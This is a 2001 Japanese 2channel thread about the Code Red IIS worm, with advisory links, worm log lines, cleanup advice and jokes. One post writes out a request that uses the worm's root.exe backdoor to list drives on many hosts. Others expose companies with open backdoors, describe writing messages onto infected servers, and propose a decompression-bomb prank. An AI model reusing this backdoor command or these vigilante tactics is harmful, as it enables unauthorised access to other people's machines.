鬱だ氏ね!コードレッド(Code Red)

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。

.∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
( ´∀`)< お前らまだやってんのかよ   |
.       \____________/

と言われても止めるわけにいかない CodeRed スレ Part4.
ひょっとして 9/30 まで続くのか?
それとも新しい亜種が登場する? 基本はマターリでお願いします。

〓〓〓 WindowsNT4.0/2000 ユーザーはチェックしよう 〓〓〓
1. ログオンして Ctrl-Alt-Del を押す
2. 「プロセス」タブを選択する
3. Inetinfo.exe プロセスを探す
4. 見つかった人で、ちゃんと対策済みと自信を持って言える人以外は
  すぐに↓をチェック!
 http://ton.2ch.net/test/read.cgi?bbs=sec&key=997283377
さらに前↓
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997150588
http://ton.2ch.net/test/read.cgi?bbs=sec&key=996563662
2名無しさん@お腹いっぱい。:2001/08/10(金) 16:16
とりあえずここを読め!
Code Red (主にII) 関係のリンク

IPA:「Code Red ワームに関する情報」
http://www.ipa.go.jp/security/ciadr/vul/20010727codered.html

マイクロソフト:対処方法
http://www.microsoft.com/japan/technet/security/codealrt.asp

橋本 喜代太さん:Code Red II についての警告
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

オランダでの観測と、東アジア爆発の中心
http://www.security.nl/misc/codered-stats/
http://jove.prohosting.com/~wingtxt/source/nakasu121.jpg
3名無しさん@お腹いっぱい。:2001/08/10(金) 16:17
これ、本スレ?
4名無しさん@お腹いっぱい。:2001/08/10(金) 16:17
5名無しさん@お腹いっぱい。:2001/08/10(金) 16:18
>>4
前スレの900に人だぁ
61:2001/08/10(金) 16:18
>>3
うん。タイトルねた切れでゴメン。
73:2001/08/10(金) 16:19
いえいえ、ごくろうさんでした。>>1
8名無しさん@お腹いっぱい。:2001/08/10(金) 16:22
コードレッドスレが上位3つ占領してますが・・・
9名無しさん@お腹いっぱい。:2001/08/10(金) 16:23

以下転載

*IISのアンインストール方法*

1.「スタート」→「設定」→「コントロールパネル」を開きます
2.コントロールパネルの中の「アプリケーションの追加と削除」アイコンを
  ダブルクリックします
3.新しく表示された画面の左側にある「Windowsコンポーネントの追加と削除」
  ボタンをクリックします
4.Windowsコンポーネントウィザード画面内の「インターネットインフォ
  メーションサービス(IIS)」のチェックを外します
5.「次へ」ボタンをクリックし、「完了」ボタンをクリックします
10名無しさん@お腹いっぱい。:2001/08/10(金) 16:24
コードレッド (Code Red) 逝ってヨシ 2
は誤爆スレをタイミングよく上げただけだからそのまま下げよう。
ちょっと笑ったけどね。まぎらわしいよ。
111:2001/08/10(金) 16:26
CodeRed GIF画と AA書いてくれた人、張るの忘れたスマソ
12名無しさん@お腹いっぱい。:2001/08/10(金) 16:27
>>9
 いきなりアンインストールしろと言われても、IIS使ってるし..(笑)
13名無しさん@お腹いっぱい。:2001/08/10(金) 16:28
  ( ´∀`)< さーて、きょうは何をエサにしようかな。
  ( ・∀・)< やっぱ『赤虫』でしょ!

  ( ´∀`)/\,  < 何がつれるか タノシミ タノシミ・・・

  ( `∀´)/\,  < おおッ!! 入れ食いかよ!!

  ( ^▽^)< ヤタ!! 今日は大漁だァ〜!! もうIISでクーラーいっぱい!!
14図解:2001/08/10(金) 16:31
┌─────┐
│ ウィソNT ..  .│       ルーター
│  IIS   .┏┷┓EtherNet.┏━┓Internet
│(´д`)  ┃80┠────┨80┠─────(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓ . . ..┗┯┛     . ┗━┛
│  ISAPI  . .│
│  ↓  .  . │
│IndexServer│
└─────┘

┌─────┐
│ ウィソNT   .│       ルーター
│  IIS .  ┏┷┓ EtherNet ┏━┓Internet
│(´д`)  ┃80┠(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓   ┗┯┛      .. ┗━┛
│  ISAPI  . .│
│  ↓     ..│
│IndexServer│
└─────┘

┌────────┐
│ ウィソNT       │       ルーター
│  IIS       ┏┷┓ EtherNet ┏━┓Internet
│(゚∀゚CodeRed)アヒャヒャヒャ〜〜〜
│  ↓      ...┗┯┛   ..    ┗━┛
│  ISAPI      . │
│BufferOverFlow!  .│
│               │
└────────┘

┌────────┐
│ ウィソNT      .  │       ルーター
│  IIS       ┏┷┓ EtherNet ┏━┓Internet
│(゚∀゚)アヒャヒャヒャ(CodeRed゚∀゚)アヒャヒャヒャ(CodeRed゚∀゚)アヒャヒャヒャ
│  ↓    .   ┗┯┛   ..    ┗━┛
│   ISAPI.  .      │
│BufferOverFlow!.  │
│   .          │
└────────┘
15名無しさん@お腹いっぱい。:2001/08/10(金) 16:34
>>12
いやね、zaqてサーバー立てんの禁止してるのよ。
だから、無条件でuninstall。
あと、しらんまにinstallされてる人も居てるからね。
16男爵:2001/08/10(金) 16:34
  ┏━━━━━━━━━━━━━━━━━┓
  ┃    コードレッド男爵があらわれた!     ┃
  ┗━━━━━━━━━━━━━━━━━┛

       |
    \/ ̄ ̄\/
   / | `皿´ ;::|
  < < ̄|     /;:::| ̄
  \\\_/_/\
    \\ |
     \     \
      |    |\\
      \   \ > >
         >   |/\
        //  /   \
       //  /      )
      // /〜〜〜〜〜〜
     (( (
      ヽ\\
        ヽ\\__
          ヽ\ |
           しU
17名無しさん@お腹いっぱい。:2001/08/10(金) 16:34
>>14
受精シーンにも見える
18男爵:2001/08/10(金) 16:34
┏━━━━━━━━━━━━━━━┓
┃コードレッド男爵の放つ        .┃
┃強烈なトラフィック攻撃!         ┃
┗━━━━━━━━━━━━━━━┛

        |
    \/ ̄ ̄\/  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     |::; `皿´ |  < トトトトトトトトト、トラフィック!!
     ̄|:::;ヽ   | ̄  \__________
     \__\_/\
      /     \
     //| _   l |  _
    /| |/ ヽ  | |/っ、、ヽ
   / \/⌒゛゛/ \/   ```
  /   |   / ヽ。    ヽ。
 /    |  | |    。    。
 〜〜〜 | || |     。    。
       | / | |      ヽ   。   。
      // | |          ___
     //  | |        /´∀`;;::\ <グワァァァァ!!重い!!
    //   | |       /    /::::::::::|
    U   U       | ./|  /:::::|::::::|
.               | ||/::::::::|::::::|
19名無しさん@お腹いっぱい。:2001/08/10(金) 16:36
          _ __    ______________________
          ノ, `'-‐┘、  || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
        く_// i     ヽ ||   メールして 逆ギレされても ツブさない
         i/ /ノ从ノ)) 〉   ./
.         i.V{ fl_| |.) |/!   /   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
          'ヽゝ~.ー /   、/〉 < バックドア突いちゃダメ♪
          /^〈不lヽ ./じ'}    | マターリとね
       く_  |/ヽ|. V f´    \________________
       / )/ .。i|/{. / ||      
.         /^Vr 〉=。||. ‐' .||
.       / /〈/  .。!!   ||
20名無しさん@お腹いっぱい。:2001/08/10(金) 16:36
>>15
>いやね、zaqてサーバー立てんの禁止してるのよ。
>だから、無条件でuninstall。
 なるほど。
21名無しさん@お腹いっぱい。:2001/08/10(金) 16:41
>>17
いや、ある意味受精みたいなもんだ。
22名無しさん@お腹いっぱい。:2001/08/10(金) 16:46
前スレの話題だけどInterQの人、まだバックドアあいてるよ。
23名無しさん@お腹いっぱい。:2001/08/10(金) 17:06
赤虫達は繁殖している
24え〜ん:2001/08/10(金) 17:06
今帰った遅かった。
25名無しさん@お腹いっぱい。:2001/08/10(金) 17:07
http://www.atmarkit.co.jp/fdotnet/wwebserv/wwebserv007/worldwebservice001.html
Code Red感染サーバの国籍を探る

.net で作っちゃうっつーのが...
26え〜ん:2001/08/10(金) 17:08
せっかくマスコットにして貰おうと思ったのに・・
http://www.nefty.net/desktop/haritsuke/img-box/img20010810131012.gif
鬱だ
27名無しさん@お腹いっぱい。:2001/08/10(金) 17:10
>>26

イイネ
281:2001/08/10(金) 17:13
>>26
ゴメン…
29え〜ん:2001/08/10(金) 17:15
>>28
スレ盾に間に合わなかった漏れが悪い。
30名無しさん@お腹いっぱい。:2001/08/10(金) 17:18
今ここ見たんだけど
http://www.security.nl/misc/codered-stats/
いったい何が起こってるの?
跳ね上がってない?
31名無しさん@お腹いっぱい。:2001/08/10(金) 17:20
日本が見えねーぞ
誰のせいだゴラァ
32名無しさん@お腹いっぱい。:2001/08/10(金) 17:24
>>30

ホントだ。下の棒グラフのメーター振りきってる。
これって爆発的に拡大してるってこと?
33名無しさん@お腹いっぱい。:2001/08/10(金) 17:25
>>30
誤診?凄すぎ
34名無しさん@お腹いっぱい。:2001/08/10(金) 17:29
35名無しさん@お腹いっぱい。:2001/08/10(金) 17:29
>>30
誤診の可能性もあるし、感染力強い亜種の可能性もあるね。
慎重に待機しよっと。
36login:名なしさん:2001/08/10(金) 17:32
>>30
おいおい、マジかよ…。ポート80念の為に塞いだほうがよさそうだね。
37名無しさん@お腹いっぱい。:2001/08/10(金) 17:32
>>30
マジ!?これ!?どうなってんの!!?
38名無しさん@お腹いっぱい。:2001/08/10(金) 17:38
>>30
集計スクリプトのバグ? っぽい気がするが。
3930:2001/08/10(金) 17:38
誤診だった見たいね
よかったよ。あんなんじゃ・・・鬱
40名無しさん@お腹いっぱい。:2001/08/10(金) 17:38
なんか戻ったね。
41名無しさん@お腹いっぱい。:2001/08/10(金) 17:39
ありゃりゃ???
なんか普通に戻ってたぞ。驚かせるなよッタク!!
42名無しさん@お腹いっぱい。:2001/08/10(金) 17:41
更新されただけで、ピークの山はあるね。
偶然かな。
43名無しさん@お腹いっぱい。:2001/08/10(金) 17:42
よかったけど、なんかちょっと、
寂しいような気もする。
44asdf:2001/08/10(金) 17:57
よかったけど、なんかちょっと、
寂しいような気もする。
45名無しさん@お腹いっぱい。:2001/08/10(金) 17:57
>>43
惚れたな(~ー~)
46%0026asdf:2001/08/10(金) 18:03
しいような気もする。
47どうなってんのよ:2001/08/10(金) 18:13
なんか、ネットワークやってる会社から、Xちゃんが
来ました。もちろん、ディレクトリ丸見え、、、。
なんか、どうなってんのよ?!晒さんと、気付かんな、こいつは。
210.250.212.XXX 

http://www.isa-j.co.jp/outline.html

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.250.212.0
b. [ネットワーク名] ISA-NET
f. [組織名] 株式会社 アイエスエイ
g. [Organization] ISA CO.,Ltd.
m. [運用責任者] TS2806JP
n. [技術連絡担当者] HM082JP
p. [ネームサーバ] ns.jp.psi.net
p. [ネームサーバ] ns2.jp.psi.net
p. [ネームサーバ] ns3.jp.psi.net
y. [通知アドレス] [email protected]
[割当年月日] 1999/04/21
[返却年月日]
[最終更新] 1999/07/16 12:41:21 (JST)
[email protected]
48lt;gt;:2001/08/10(金) 18:20
afsafsf
49amp:2001/08/10(金) 18:25
afafsffs
50名無しさん@お腹いっぱい。:2001/08/10(金) 18:26
>>47
ここも似たようなモンかな。
外部からのアクセスは弾かれたので内部感染ダターリして
意図的にテストしてるのが漏れてるとしたらゴラァだな。
jsat-sv1.jsat.ne.jp

ttp://www.jsat.ne.jp/
a. [ドメイン名] JSAT.NE.JP
b. [ねっとわーくさーびすめい] じぇいさっと
c. [ネットワークサービス名] JSAT
d. [Network Service Name] JSAT
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] MS4926JP
n. [技術連絡担当者] MS4926JP
p. [ネームサーバ] ns1.jsat.ne.jp
p. [ネームサーバ] dns3.dion.ne.jp
y. [通知アドレス] [email protected]
[状態] Connected (2002/03/31)
[登録年月日] 2000/07/04
[接続年月日] 2000/07/06
[最終更新] 2001/01/26 21:56:02 (JST)
[email protected]
51なんかさー:2001/08/10(金) 18:33
いまも、1分間に、中国、韓国、パキスタンから
がんがん打ち込まれてるし、小一時間前は、
日本の某企業から、がんがん打ち込まれるし、
Xさんって、、、、かなりやばいような、、、。
一号どころじゃないね、これ。
52名無しさん@お腹いっぱい。:2001/08/10(金) 18:42
>>47
http://www.isa-j.co.jp/mame/leakage.html
リブトでディレクトリ全開
53え〜ん:2001/08/10(金) 18:47
61.141.GD.CN から来たんだけど偽装?エラー?
54名無しさん@お腹いっぱい。:2001/08/10(金) 18:48
たった今M$KKからWin2KPro登録ユーザへの警告メールが届いた。
おせーよ・・・
55gt;54:2001/08/10(金) 18:50
なんか、プロフェッショナリズムって
なんだろう、、と考えてみる。
56名無しさん@お腹いっぱい。:2001/08/10(金) 18:54
>>53
それ、おれのトコにも来てるよ(常連さん)
IP、61かい?
57名無しさん@お腹いっぱい。:2001/08/10(金) 18:58
inetnum: 61.140.0.0 - 61.143.255.255
>>53 >>56
ここです。
DNS: 61.141.GD.CN

netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: Data Communication Division
descr: China Telecom
country: CN
58え〜ん:2001/08/10(金) 19:00
>>56
そう今、61
今見たら1週間前ぐらいにも来てた。
また今日もどさくさにまぎれてFTPにアノニしようとしたやつも。
こっちは全然ちがうIP
59え〜ん:2001/08/10(金) 19:01
>>57
サンクス
なんだラーメン屋か
60名無しさん@お腹いっぱい。:2001/08/10(金) 19:02
思えば最初の赤虫の来訪って7/20だったから
もう、20日ぐらい経つんだなぁ。
最初の時は見慣れぬ NNNNNNNNNNN にビビった。
良い思いでです。
61名無しさん@お腹いっぱい。:2001/08/10(金) 19:03
>>58
anonymous ftp に、中身全部0の "erotic.mpg" とか
置いといてあげれば?
62お昼ごろ来ました:2001/08/10(金) 19:07
inetnum: 202.108.0.0 - 202.108.255.255
netname: CHINANET-BJ
descr: CHINANET Beijing province network
descr: Data Communication Division
descr: China Telecom
country: CN
63え〜ん:2001/08/10(金) 19:13
>>61
それもおもろいな。
今度morodasi.lzh[解凍すると500Mバイト]とセットで置いとこう。
サンクス
64え〜ん:2001/08/10(金) 19:17
一番最初に来たやつみんなで見ない?
おれこれ
216.25.164.226 - - [20/Jul/2001:01:43:45 +0900] "GET /default.ida?NNNN
65名無しさん@お腹いっぱい。:2001/08/10(金) 19:32
おれはこれ。

198.153.129.12 - - [20/Jul/2001:01:49:13 +0900] "GET /default.ida?NNN
66名無しさん@お腹いっぱい。:2001/08/10(金) 19:43
頭がなくなっちゃったけどこれ
ホントは19時ぐらいだったけど 知らないで消してた(w
05.93.130 - - [19/Jul/2001:23:09:25 +0900] "GET /default.ida?NN
67名無しさん@お腹いっぱい。:2001/08/10(金) 19:43
そういえば、7月の頭の方で
11:03:00 xxx.x.xxx.xxx - GET /h6}jwu7ssl7}|6l}v}}j~6}thw}h6ooo77"hllpp 404 Mozilla/3.0+(compatible)
11:04:06 xxx.x.xxx.xxx - GET /h6}{}j|vy7uystwt7}|6l}v}}j~6}thw}h6ooo77"hllpp 404 Mozilla/3.0+(compatible)
11:05:20 xxx.x.xxx.xxx - GET /h6kwttws7wtysqr7}|6l}v}}j~6}thw}h6ooo77"hllpp 404 Mozilla/3.0+(compatible)
11:05:22 xxx.x.xxx.xxx - GET /h6j}|qz7wtysqr7}|6l}v}}j~6}thw}h6ooo77"hllpp 404 Mozilla/3.0+(compatible)
11:05:27 xxx.x.xxx.xxx - GET /h6tq~jw7qswt7}|6l}v}}j~6}thw}h6ooo77"hllpp 404 Mozilla/3.0+(compatible)
とかいうのがあって、なんじゃこりゃあと
思ったけど、なんだったんかな。
68名無しさん@Emacs:2001/08/10(金) 19:47
Shift JIS でなんか書いてある感が…
69名無しさん@お腹いっぱい。:2001/08/10(金) 19:59
.deだったからドイツ語?
70名無しさん@お腹いっぱい。:2001/08/10(金) 20:02
えと、思い切りFAQだろうし、ツールそのものも問題があるのだろうけど、
RedCODEv1
RedCODEv2
RedCODEU
に感染された/バックドア−作られたかどうかスキャンするツールってありませんかね?
依頼があって、明日中にやられたっぽいマシンを全部駆除しなきゃならんのです。
ポインタとかでもよいので教えてくださいです。ぺこり。

ちなみに某上場企業です
7170:2001/08/10(金) 20:04
ちなみに、プライベートでクラスBの社内ネットらしい。
ファイアウォールで全部遮断できたはずなんだけど
内部から一気に感染したらしい。
ノートパソコンを持ち込んだ奴がいるらしい。
どーすんだよ・・・
72名無しさん@お腹いっぱい。:2001/08/10(金) 20:05
73名無しさん@お腹いっぱい。:2001/08/10(金) 20:06
こんな非常時でもコツコツと21を叩いて廻るアメ公マンセー
7470:2001/08/10(金) 20:07
私は
64.55.151.5 - - [20/Jul/2001:06:06:51 +0900] "GET /default.ida?NNN
でした。
7560:2001/08/10(金) 20:08
>>74
60の間違いでした。
76名無しさん@お腹いっぱい。:2001/08/10(金) 20:09
しかし、
何でまた>>70みたいのに頼んだんだ?(藁
その某上場企業。(藁藁
77名無しさん@お腹いっぱい。:2001/08/10(金) 20:11
7877:2001/08/10(金) 20:12
>>70
ごめん。セキュリティーチェックだった。
探してます。
79名無しさん@お腹いっぱい。:2001/08/10(金) 20:12
>>71
CodRedはファイヤーウォール内のIISサーバーでも外部からアクセスできる状態なら感染するんじゃなかったっけ?
8060:2001/08/10(金) 20:12
>>70
http://www.symantec.com/region/jp/securitycheck/index.html
ここは?
個々にテストしないといけないから、面倒か(w
81名無しさん@お腹いっぱい。:2001/08/10(金) 20:13
>>70
何を今ごろ言ってる。という意見もあると思いますが、重要度によっては
考えなくも有りません。
どんなお立場(SIの保守担当や、企業のシステム部門)で、どの程度の台数
が有るか、そして一番重要な点ですが、その上場企業のお名前を教えてください。
そうしないと答えようが有りません。
82名無しさん@お腹いっぱい。:2001/08/10(金) 20:14
うげ、みんな優しいな…(藁
83名無しさん@お腹いっぱい。:2001/08/10(金) 20:15
eEyeのが一気に出来るけど、本当に悪用ではなんだろうか。
84名無しさん@お腹いっぱい。:2001/08/10(金) 20:15
やっぱ172.16.*.*にパケット送りまくるんだろうか・・・嫌すぎ・・・
ってうちはWin9xが大半で今時社内nukeが効きますけど(w
85名無しさん@お腹いっぱい。:2001/08/10(金) 20:15
>>70

内部プライベートだったらとりあえずNATで外へ出る80とめちまえ。
で、インターネットが見れないよん、困るじゃないかボケといわれ
たらproxyを8080とか80以外の適当なポート番号で立てちまえ。で
後でまったり除去しな。
86名無しさん@お腹いっぱい。:2001/08/10(金) 20:16
61.*.*.*で日本からの攻撃は確実に少なくなってる。
最近5時間でわずか3匹。
攻撃の全体的な回数はそれほど変化無いけどね。
87名無しさん@お腹いっぱい。:2001/08/10(金) 20:18
>>86
日本の場合、通報マニアがいるらしいよ
88え〜ん:2001/08/10(金) 20:19
>>85
80ポート塞いでも外は見れるよね。
8977:2001/08/10(金) 20:20
>>70
裏口は
/Intpub/scriptsにroot.exeがあれば確定でしょ?

で、RedCODEv1はリブートすればオッケーだったはず。

どっちにしろ、パッチの当たってないマシンのログみてみれば、わかるでしょ?
パッチ当たってなかったら100%感染するんだから。
9060:2001/08/10(金) 20:20
>>87
マニアではないが通報(お知らせ)はしてますよ。
一向に改善されてませんが・・・
91名無しさん@お腹いっぱい。:2001/08/10(金) 20:23
今日は0時からワームちゃんが169匹きてるよん。
92名無しさん@お腹いっぱい。:2001/08/10(金) 20:26
今のところ1時間に10匹ペース。
93名無しさん@お腹いっぱい。:2001/08/10(金) 20:29
考えてみたら感染しているかどうかに関わらず対処する
必要があるんだからやっぱ >>70 はおかしいね。
94名無しさん@お腹いっぱい。:2001/08/10(金) 20:37
>>70
前スレに「自動駆除ツール」へのリンクがあがってなかったっけ?
調べるだけなら、特定のフォルダに特定のファイルがあるか、
特定のレジストリに特定のキーがあるか、を調べるだけだから、
そんなに難しい話ではないよ。チェックツールぐらい、1時間も
あれば作れるでしょう。
95名無しさん@お腹いっぱい。:2001/08/10(金) 20:43
駆除中に愛人にモデムやPHSを使ってでメールをするのも禁止よ
96名無しさん@お腹いっぱい。:2001/08/10(金) 20:43
>>70 をバックドア探し厨房と断定します。
よろしいですね。
9770:2001/08/10(金) 20:49
>>76
研究部門なんですよ。こっちは数値計算関係に特化した出入りの計算屋。
特にネットワーク管理を請け負ってるわけではありません。
ただ頼まれてファイアウォールの設定にかかわった。
>>79
ファイアウォールは7月の段階でdefault.ida付のコネクションを両方とも叩ききるようにしていたので
安心していたのでした。昨日になっていきなり内部から外部へのREDCODEが発生して感染したのを
確認しました。
>>81
そういうわけなので、正式な業務依頼にはならないと思う。
台数は100〜200台かな?個人が勝手に持ち込んだパソコンもいれると見当がつかない。
ちなみに、研究所の別部署ではセキュリティ関係やってたりする(藁)
98名無しさん@お腹いっぱい。:2001/08/10(金) 20:50
>>86
1秒間に十回以上来ていたのが、接続し直して、IPが61に変わった途端、
ピタリと止まりました。
また変わったら来るのかな…
99名無しさん@お腹いっぱい。:2001/08/10(金) 20:51
>>70
http://172.16.0.0/scripts/root.exe?/c+dir+"c:\"
↑こんなのを、テキストファイルに、その会社の内部IPアドレスの数だけ
テキストファイルに書いて、Iriaとかのダウンロードツールに読み込ませて
一斉にダウンロードをかける。あとは落としたhtmlの中身を見れば、一目瞭然。
(あー、でも、これじゃあファイル名が重複してるから上書きされちゃうか。)
10070:2001/08/10(金) 20:57
>>96
やろうとしていることは同じことだからそれでいいと思います。
最終的にはBugTraqに流れていたtflindex.cを改造するつもり。
101名無しさん@お腹いっぱい。:2001/08/10(金) 20:58
>>97
感染したかどうかに関わらず、パッチを当てないと再感染してしまいます。
なので、>>99ももちろん必要ですが、結局一台一台チェックしないとまずいです。
うんで、パッチがちゃんと当たっているか?を見つけるツールは過去レス参照して
下さい。

まぁ色々諸事情あると思いますが、頼まれてファイアウォールの設定なんか
お互いの幸せの為にも、やらない方がいいです。
102名無しさん@お腹いっぱい。:2001/08/10(金) 20:58
>>99 それはちょっと効率悪すぎ(笑)
普通に内部LANすべてのホストの port80 にスキャンして、
開いてるマシン全部に除去&パッチすればよいのでは?
103名無しさん@お腹いっぱい。:2001/08/10(金) 21:00
つか、結局はその200台全部にSP2あてて、パッチあてて、なんでしょ。
しかも業務依頼にならない……。
お疲れ、御苦労、ご愁傷様……。
10470:2001/08/10(金) 21:02
>>99
あ、その発想すばらしい。
ファイルの中身見なくても、横からトラフィック監視してれば一発ですね。
その路線でいこうかな。
10570:2001/08/10(金) 21:07
>>103
そこまではするつもり毛頭ありません
ただ、感染してる奴のコンセントをぼこぼこ引っこ抜いて回るだけ。
それだけで信用関係が保てれば安いもんです。
もちろん、「いずれちゃんとした専門家に任せるんだよ」と
クギはさしておきますです。
商売の邪魔をするつもりはありませんのでご安心を。
106名無しさん@お腹いっぱい。:2001/08/10(金) 21:08
iriaは、保存の設定を「構造を再現する」にしておけば、上書きしないよ。
ただし、IP毎に別のフォルダが出来るけど。
107名無しさん@お腹いっぱい。:2001/08/10(金) 21:10
>>105
コードレッドの感染力、挙動をご理解の上での発言とは思えません。
過去ログを読んで戴けるとありがたいです。
10870:2001/08/10(金) 21:12
ついでにみなさんにご朗報:
うちの会社、仕事柄大学にも出入りしているんだけど、大学の総合情報処理センターやら
計算機センターがセキュリティ関係でめろめろになってるみたい。
で、文部科学省の方針で、「セキュリティは事務にまかせる」方針になったようです(国立大学)。
もちろん事務は外注に頼るしかないわけで、ここ数年のうちに
セキュリティ関連会社に大量に依頼が殺到すると思われ。
取ってない会社は即急に入札資格を取っておくほうがよいと思う.
109名無しさん@お腹いっぱい。:2001/08/10(金) 21:14
>>108
予算は2兆ぐらい?
110名無しさん@お腹いっぱい。:2001/08/10(金) 21:14
なんとなく>>70をうさん臭く感じる人の数->
111名無しさん@お腹いっぱい。:2001/08/10(金) 21:16
>>70 は 2ch で遊んでないでさっさと仕事
をしたほうが良いと思われ
112名無しさん@お腹いっぱい。:2001/08/10(金) 21:16
>>110
気持はわかるが、こーゆう奴が多いから赤虫大流行です。
ここで70を叩いても…
ふー。
113名無しさん@お腹いっぱい。:2001/08/10(金) 21:20
>>108
大学の総合情報処理センターでアルバイトをしている学生だけど、自分たちで対応したよ。
まだまだ稚拙かもしれないけれど、この程度のことならできるし。
何より計算機屋を目指すものとしてのプライドもあるつもりだよ。
関係ないけど、うちはウェブサーバーを目的にしたIISは1台もなくて、ただ最初から入っていただけだったよ。
114名無しさん@お腹いっぱい。:2001/08/10(金) 21:23
うちの大学も全部UNIX系OSだったよ
研究室のPCは学生たちで管理してたし
115名無しさん@お腹いっぱい。:2001/08/10(金) 21:24
何故その専門家とやらを、直ぐに召還せんのか?>>70
116え〜ん:2001/08/10(金) 21:26
117名無しさん@お腹いっぱい。:2001/08/10(金) 21:27
ディスクトップに"CodeRedに感染してます。"と書かれたフォルダー
ここのアドレスのフォルダー"http://ton.2ch.net/test/read.cgi?bbs=sec&key=997427742"
ここは何の掲示板なのでしょうか?
118え〜ん:2001/08/10(金) 21:29
>>117
もしかしてQちゃん?
119名無しさん@お腹いっぱい。:2001/08/10(金) 21:30
>>113
そりゃ出来るよ。ただ、こういうのは、能力の問題じゃなくて、
信用の問題なのよ。アルバイトに1万円払うか、専門の会社に
100万円払うか、の選択となったら、専門の会社に100万払
う方を選択するってのが普通。(1万と100万じゃあ、ちょっ
と大げさか?)例え結果が一緒でもね。
もし、その修復(管理)でなにかトラブルが起きたとき、いった
い誰が責任をとるのか?って話になるのよね。
ばかげた話だと思うところもあるんだけどね。
120名無しさん@お腹いっぱい。:2001/08/10(金) 21:32
>>117
InterQ のユーザーさんですか?
121名無しさん@お腹いっぱい。:2001/08/10(金) 21:32
>>117
お帰りぃー
122名無しさん@お腹いっぱい。:2001/08/10(金) 21:33
>>117
それはあなたがウイルスに感染しているとゆうことです。
>>1のリンク先を全て見てください。
123名無しさん@お腹いっぱい。:2001/08/10(金) 21:34
>>117
つか、早く駆除しろ。(藁
124名無しさん@お腹いっぱい。:2001/08/10(金) 21:35
>>117
>ここは何の掲示板なのでしょうか?
なんでそんな奴がsageを知っているんだ??
125名無しさん@お腹いっぱい。:2001/08/10(金) 21:35
でも、>>117ってちゃんとsageしてるよね?
文章から見るとココ始めてっぽいけど、どうなん?
126名無しさん@お腹いっぱい。:2001/08/10(金) 21:35
fusianasan ってここ使えたっけ? 170 の IP 確認したいっ!
127名無しさん@お腹いっぱい。:2001/08/10(金) 21:36
ネタか
128名無しさん@お腹いっぱい。:2001/08/10(金) 21:36
ちょっと火垂るの墓で泣いて来ます。
129login:名なしさん:2001/08/10(金) 21:39
おっとオレもホタルの墓を見に逝こう
130名無しさん@お腹いっぱい。:2001/08/10(金) 21:40
本物の InterQ クン来ないかなぁ...
131名無しさん@お腹いっぱい。:2001/08/10(金) 21:40
サゲ知っている位なら、今やキャバ嬢でも沢山いる。
W2K系のOSを使って常時接続している中途半端ユーザに一票(藁
132名無しさん@お腹いっぱい。:2001/08/10(金) 21:41
>>117
前スレ見ると
2001/08/10 10:50 <DIR>
このサーバーはCode Redに感染し回り迷惑しています! 及びバックドアが開いております!
早急な処置を! 参照→http://ton.2ch.net/sec/index2.html (//は半角にしてね)

2001/08/10 11:01 <DIR>
このサーバーはCode Redに感染し回り迷惑しています! 及びバックドアが開いております!

こうゆうフォルダのはずだから、やっぱネタか。
133名無しさん@お腹いっぱい。:2001/08/10(金) 21:42
Qちゃんとは別人の可能性も?
134名無しさん@お腹いっぱい。:2001/08/10(金) 21:43
Qちゃん女子高生画とかイパーイ持ってそうだからお友達になりたいYO!
135名無しさん@お腹いっぱい。:2001/08/10(金) 21:44
第一、ディスクトップだしな・・・
136名無しさん@お腹いっぱい。:2001/08/10(金) 21:44
117再登場きぼ〜ん。
137名無しさん@お腹いっぱい。:2001/08/10(金) 22:14
>>117は、ただいま>>1のリンク先を探索中・・・
138名無しさん@お腹いっぱい。:2001/08/10(金) 22:19
QちゃんつながらなくなったYO
139hearts;:2001/08/10(金) 22:31
↓これって、故意と見なしていい?

63.83.50.* - - [10/Aug/2001:22:17:21 +0900] "GET /default.ida?XXXX(省略) HTTP/1.1" 200 639 "-" "Mozilla/4.0 (compatible; MSIE.4.01; Windows NT)"
140名無しさん@お腹いっぱい。:2001/08/10(金) 22:33
>>139
手動爆撃??
見たところアメリカからのようだが・・・
141名無しさん@お腹いっぱい。:2001/08/10(金) 22:34
>>139
つーか、キミがそこ見に行ったんじゃないの?
でログをたどって来たと。
142名無しさん@お腹いっぱい。:2001/08/10(金) 22:36
結局、相も変わらずDial upで来る奴って

『98使ってるより2000使ってるっていう方が通っぽい』とか
『98より2000の方が新しいの?』とかって勘違いした厨房が
 2000PRO入れて
         ↓
良く判らんまま割れ物入れて、
         ↓
そんなんだからIIS勝手にインストールされたのも気付かず、
         ↓
       赤虫感染
         ↓
でもlogの見方もわかんないから結局未だ気付かず。
         ↓
バックドア全開でIPを見せてまわってる。

ってゆうオチか。
なんとかしてくれ。
143139:2001/08/10(金) 22:38
>>141
行ってないっすよ。

ちなみに、ステータスが200なのは、ダミー置いてるから。(w
144名無しさん@お腹いっぱい。:2001/08/10(金) 22:39
>>142
確かに、ただ格好いいからって理由でNT/2000使ってるやつって意外に多い。
145名無しさん@お腹いっぱい。:2001/08/10(金) 22:41
特に2000からNT系に入った人はそういうのが・・・
146名無しさん@お腹いっぱい。:2001/08/10(金) 22:42
お盆だね。
147名無しさん@お腹いっぱい。:2001/08/10(金) 22:51
>>143
ダミーって「赤虫わっしょい」のアレか?
148名無しさん@お腹いっぱい。:2001/08/10(金) 22:53
149名無しさん@お腹いっぱい。:2001/08/10(金) 22:54
既製PCのプリインストールモデルにIISが入っていないのが幸いだ
150139:2001/08/10(金) 22:57
>>147
違うっす。でも似たようなもんっすね。(w
151名無しさん@お腹いっぱい。:2001/08/10(金) 23:10
>>142
未だに、コードレッドがこんなに大変だぁって事すら知らない可能性も
ありおりはべりいまそかり。
152名無しさん@お腹いっぱい。:2001/08/10(金) 23:22
話の流れからして70はUNIX系の専門家でしょ
